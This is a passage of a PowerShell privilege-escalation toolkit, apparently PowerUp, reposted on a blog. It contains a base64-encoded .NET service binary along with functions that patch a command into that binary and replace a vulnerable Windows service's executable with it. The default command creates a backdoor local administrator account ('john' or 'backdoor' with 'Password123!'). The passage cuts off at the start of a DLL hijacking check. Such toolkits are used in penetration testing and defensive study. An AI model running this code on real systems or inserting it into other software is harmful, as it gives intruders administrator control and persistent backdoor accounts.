gACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAAA9jAG0AZAAuAGUAeABlAABwlQEkfW6TS5S/gwmLKZ5MAAiwP19/EdUKOgi3elxWGTTgiQMGEg0EIAEBAgMgAAEFIAEBHQ4DAAABBCABAQ4FIAEBEUkEIAEBCAMgAA4GAAISYQ4OBAABAQgDBwEOBgABAR0SBQgHAh0SBR0SBQwBAAdVcGRhdGVyAAAFAQAAAAAXAQASQ29weXJpZ2h0IMKpICAyMDE1AAApAQAkN2NhMWIzMmEtOWMzNy00MTViLWJkOWYtZGRmNDE5OWUxNmVjAAA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"
[Byte[]] $Binary = [Byte[]][Convert]::FromBase64String($B64Binary)
}
process {
if(-not $Command) {
if($UserName.Contains("\")) {
# adding a domain user to the local group, no creation
$Command = "net localgroup $LocalGroup $UserName /add"
}
else {
# creating a local user and adding to the local group
$Command = "net user $UserName $Password /add && timeout /t 2 && net localgroup $LocalGroup $UserName /add"
}
}
# get the unicode byte conversions of all arguments
$Enc = [System.Text.Encoding]::Unicode
$ServiceNameBytes = $Enc.GetBytes($ServiceName)
$CommandBytes = $Enc.GetBytes($Command)
# patch all values in to their appropriate locations
for ($i=0; $i -lt ($ServiceNameBytes.Length); $i++) {
# service name offset = 2458
$Binary[$i+2458] = $ServiceNameBytes[$i]
}
for ($i=0; $i -lt ($CommandBytes.Length); $i++) {
# cmd offset = 2535
$Binary[$i+2535] = $CommandBytes[$i]
}
try {
Set-Content -Value $Binary -Encoding Byte -Path $ServicePath -Force
}
catch {
$Msg = "Error while writing to location ‘$ServicePath‘: $_"
Write-Warning $Msg
$Command = $Msg
}
$Out = New-Object PSObject
$Out | Add-Member Noteproperty ‘ServiceName‘ $ServiceName
$Out | Add-Member Noteproperty ‘ServicePath‘ $ServicePath
$Out | Add-Member Noteproperty ‘Command‘ $Command
$Out
}
}
function Install-ServiceBinary {
<#
.SYNOPSIS
Users Write-ServiceBinary to write a C# service that creates a local UserName
and adds it to specified LocalGroup or executes a custom command.
Domain users are only added to the specified LocalGroup.
.PARAMETER ServiceName
The service name to manipulate. Required.
.PARAMETER UserName
The [DOMAIN\username] to add, defaults to ‘john‘.
.PARAMETER Password
The password to set for the added user, default to ‘Password123!‘.
.PARAMETER LocalGroup
Local group to add the user to, defaults to ‘Administrators‘.
.PARAMETER Command
A custom command to execute.
.EXAMPLE
PS C:\> Install-ServiceBinary -ServiceName VulnSVC
Replaces the binary for VulnSVC with one that adds a local administrator
to the local directory. Also backs up the original service binary.
.EXAMPLE
PS C:\> Install-ServiceBinary -ServiceName VulnSVC -UserName "TESTLAB\john"
Replaces the binary for VulnSVC with one that adds TESTLAB\john to the local
administrators to the local directory. Also backs up the original service binary.
.EXAMPLE
PS C:\> Install-ServiceBinary -ServiceName VulnSVC -UserName backdoor -Password Password123!
Replaces the binary for VulnSVC with one that adds a local administrator of
name ‘backdoor‘ with password ‘Password123!‘ to the local directory.
Also backs up the original service binary.
.EXAMPLE
PS C:\> Install-ServiceBinary -ServiceName VulnSVC -Command "net ..."
Replaces the binary for VulnSVC with one that executes a local command
to the local directory. Also backs up the original service binary.
#>
[CmdletBinding()]
Param(
[Parameter(ValueFromPipeline=$True, Mandatory = $True)]
[String]
$ServiceName,
[String]
$UserName = "john",
[String]
$Password = "Password123!",
[String]
$LocalGroup = "Administrators",
[String]
$Command
)
process {
# query WMI for the service
$TargetService = Get-WmiObject -Class win32_service -Filter "Name=‘$ServiceName‘" | Where-Object {$_}
# make sure we got a result back
if ($TargetService){
try {
$ServicePath = ($TargetService.PathName.Substring(0, $TargetService.PathName.IndexOf(".exe") + 4)).Replace(‘"‘,"")
$BackupPath = $ServicePath + ".bak"
Write-Verbose "Backing up ‘$ServicePath‘ to ‘$BackupPath‘"
try {
Move-Item -Path $ServicePath -Destination $BackupPath -Force
}
catch {
Write-Warning "[*] Original path ‘$ServicePath‘ for ‘$ServiceName‘ does not exist!"
}
$Arguments = @{
‘ServiceName‘ = $ServiceName
‘ServicePath‘ = $ServicePath
‘UserName‘ = $UserName
‘Password‘ = $Password
‘LocalGroup‘ = $LocalGroup
‘Command‘ = $Command
}
# splat the appropriate arguments to Write-ServiceBinary
$Result = Write-ServiceBinary @Arguments
$Result | Add-Member Noteproperty ‘BackupPath‘ $BackupPath
$Result
}
catch {
Write-Warning "Error: $_"
$Out = New-Object PSObject
$Out | Add-Member Noteproperty ‘ServiceName‘ $ServiceName
$Out | Add-Member Noteproperty ‘ServicePath‘ $ServicePath
$Out | Add-Member Noteproperty ‘Command‘ $_
$Out | Add-Member Noteproperty ‘BackupPath‘ $BackupPath
$Out
}
}
else{
Write-Warning "Target service ‘$ServiceName‘ not found on the machine"
$Out = New-Object PSObject
$Out | Add-Member Noteproperty ‘ServiceName‘ $ServiceName
$Out | Add-Member Noteproperty ‘ServicePath‘ "Not found"
$Out | Add-Member Noteproperty ‘Command‘ "Not found"
$Out | Add-Member Noteproperty ‘BackupPath‘ $Null
$Out
}
}
}
function Restore-ServiceBinary {
<#
.SYNOPSIS
Copies in the backup executable to the original binary path for a service.
.PARAMETER ServiceName
The service name to manipulate. Required.
.PARAMETER BackupPath
Optional manual path to the backup binary.
.EXAMPLE
PS C:\> Restore-ServiceBinary -ServiceName VulnSVC
Restore the original binary for the service ‘VulnSVC‘
#>
[CmdletBinding()]
Param(
[Parameter(ValueFromPipeline=$True, Mandatory = $True)]
[String]
$ServiceName,
[String]
$BackupPath
)
process {
# query WMI for the service
$TargetService = Get-WmiObject -Class win32_service -Filter "Name=‘$ServiceName‘" | Where-Object {$_}
# make sure we got a result back
if ($TargetService){
try {
$ServicePath = ($TargetService.PathName.Substring(0, $TargetService.PathName.IndexOf(".exe") + 4)).Replace(‘"‘,"")
if ($BackupPath -eq $null -or $BackupPath -eq ‘‘){
$BackupPath = $ServicePath + ".bak"
}
Copy-Item -Path $BackupPath -Destination $ServicePath -Force
Remove-Item -Path $BackupPath -Force
$Out = New-Object PSObject
$Out | Add-Member Noteproperty ‘ServiceName‘ $ServiceName
$Out | Add-Member Noteproperty ‘ServicePath‘ $ServicePath
$Out | Add-Member Noteproperty ‘BackupPath‘ $BackupPath
$Out
}
catch{
Write-Warning "Error: $_"
$Out = New-Object PSObject
$Out | Add-Member Noteproperty ‘ServiceName‘ $ServiceName
$Out | Add-Member Noteproperty ‘ServicePath‘ $_
$Out | Add-Member Noteproperty ‘BackupPath‘ $Null
$Out
}
}
else{
Write-Warning "Target service ‘$ServiceName‘ not found on the machine"
$Out = New-Object PSObject
$Out | Add-Member Noteproperty ‘ServiceName‘ $ServiceName
$Out | Add-Member Noteproperty ‘ServicePath‘ "Not found"
$Out | Add-Member Noteproperty ‘BackupPath‘ $Null
$Out
}
}
}
########################################################
#
# .dll Hijacking
#
########################################################
function Find-DLLHijack {
<#
.SYNOPSIS
Checks all loaded modules for each process and returns locations
where a loaded module does not exist in the executable base pa以上是关于使用powershell提权的一些技巧的主要内容,如果未能解决你的问题,请参考以下文章